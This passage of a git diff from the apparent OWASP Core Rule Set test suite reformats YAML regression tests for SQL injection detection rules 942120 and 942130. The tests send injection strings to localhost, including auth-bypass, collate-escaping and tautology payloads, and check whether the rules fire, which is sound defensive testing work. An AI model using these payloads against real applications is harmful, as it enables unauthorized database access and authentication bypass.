HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "XOR" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 9 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%3C%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%3C%3D" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 10 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "IS NULL" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "IS NULL" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 11 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "in (0,1)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "in (0,1)" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 12 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "in (2147483647,-1)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "in (2147483647,-1)" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 13 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%3C%3D%3E" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%3C%3D%3E" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 14 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "regexp" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "regexp" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 15 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "RLIKE" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "RLIKE" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 16 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "<>" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "<>" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 17 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 18 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "+IN+%28815914%2C+815913%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "+IN+%28815914%2C+815913%29%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 19 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 20 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay= in ( Aa,- Ab-, and Ac)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay= in ( Aa,- Ab-, and Ac)" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 21 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "%3E%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "%3E%3D" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 22 desc: "SQL Injection Attack: not between * and " stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select%20*%20from%20user%20where%20password_last_changed%20not%20between%20'2021-04-11'%20and%20'2021-04-11'" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select%20*%20from%20user%20where%20password_last_changed%20not%20between%20'2021-04-11'%20and%20'2021-04-11'" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 23 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=z'or%20email%20notnull--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=z'or%20email%20notnull--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 24 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=x'%20or%20username%20like%20totpSecret%20escape%20'x';" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=x'%20or%20username%20like%20totpSecret%20escape%20'x';" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 25 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op'%20and%20email%20ilike%20email--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op'%20and%20email%20ilike%20email--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 26 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op'%20and%20email%20%3d%20all%20(select%20email)--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op'%20and%20email%20%3d%20all%20(select%20email)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 27 desc: "SQLite collate nocase" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%20nocase--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%20nocase--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 28 desc: "SQLite collate nocase" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%20nocase--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%20nocase--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 29 desc: "SQL collate`nocase`" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%60nocase%60--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%60nocase%60--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 30 desc: "Invalid SQL collate foo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%20foo--" - version: HTTP/1.0 - output: - no_log_contains: id "942120" - - test_title: 942120-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%20foo--" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942120] + - test_id: 31 desc: "Invalid SQL collate foo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # collate`utf8mb4_general_ci` - data: "var=user'collate%60utf8mb4_general_ci%60--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # collate`utf8mb4_general_ci` + data: "var=user'collate%60utf8mb4_general_ci%60--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 32 desc: "Collate bypass with character escaping" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # collate"\utf8mb4_general_ci" - data: "var=user'collate%22%5Cutf8mb4_general_ci%22--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # collate"\utf8mb4_general_ci" + data: "var=user'collate%22%5Cutf8mb4_general_ci%22--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 33 desc: "Collate bypass with postgress string escaping U&" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # collate U&"\0441\043B\043E\043D" - data: "var=user'collate U%26%22%241%23B%23E%23D%22--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-34 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # collate U&"\0441\043B\043E\043D" + data: "var=user'collate U%26%22%241%23B%23E%23D%22--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 34 desc: "Detect auth bypass email=' notnull --" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=%27%20notnull%20--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=%27%20notnull%20--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 35 desc: "Test for IJ5N1CXB - unlikely" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op'and%20unlikely%20(id)--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op'and%20unlikely%20(id)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 36 desc: "Negative test for IJ5N1CXB - unlikely" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: - text=It is highly unlikely this is going to be a false positive - version: HTTP/1.0 - output: - no_log_contains: id "942120" - - test_title: 942120-37 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: text=It is highly unlikely this is going to be a false positive + version: HTTP/1.0 + output: + log: + no_expect_ids: [942120] + - test_id: 37 desc: "Test for HOH7M88Q - likelihood" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: | - email=admin%40juice-sh.op\'%20and(%20likelihood%20(id,.0));' - version: HTTP/1.1 - output: - log_contains: id "942120" - - test_title: 942120-38 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + email=admin%40juice-sh.op\'%20and(%20likelihood%20(id,.0));' + version: HTTP/1.1 + output: + log: + expect_ids: [942120] + - test_id: 38 desc: "Negative test for HOH7M88Q - likelihood" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: | - text=After calculating the likelihood this should not be matched. - version: HTTP/1.1 - output: - no_log_contains: id "942120" - - test_title: 942120-39 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + text=After calculating the likelihood this should not be matched. + version: HTTP/1.1 + output: + log: + no_expect_ids: [942120] + - test_id: 39 desc: "Detect path-based SQLi attempt" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - method: POST - uri: "/post/catalogue/rest/products/2499999||this.product/reviews" - version: HTTP/1.0 - output: - log_contains: id "942120" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: POST + uri: "/post/catalogue/rest/products/2499999||this.product/reviews" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml index 594e372..c4d4e99 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml @@ -1,160 +1,158 @@ --- meta: author: "Christian S.J. Peron and Allan Boll, Franziska Bühler, azurit" - description: None - enabled: true - name: 942130.yaml +rule_id: 942130 tests: - - test_title: 942130-1 + - test_id: 1 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test" - version: HTTP/1.0 - output: - no_log_contains: id "942130" - - test_title: 942130-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942130] + - test_id: 2 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=1=1" - version: HTTP/1.1 - output: - log_contains: id "942130" - - test_title: 942130-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1=1" + version: HTTP/1.1 + output: + log: + expect_ids: [942130] + - test_id: 3 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=11=1" - version: HTTP/1.1 - output: - no_log_contains: id "942130" - - test_title: 942130-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11=1" + version: HTTP/1.1 + output: + log: + no_expect_ids: [942130] + - test_id: 4 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=1=11" - version: HTTP/1.1 - output: - no_log_contains: id "942130" - - test_title: 942130-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1=11" + version: HTTP/1.1 + output: + log: + no_expect_ids: [942130] + - test_id: 5 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - 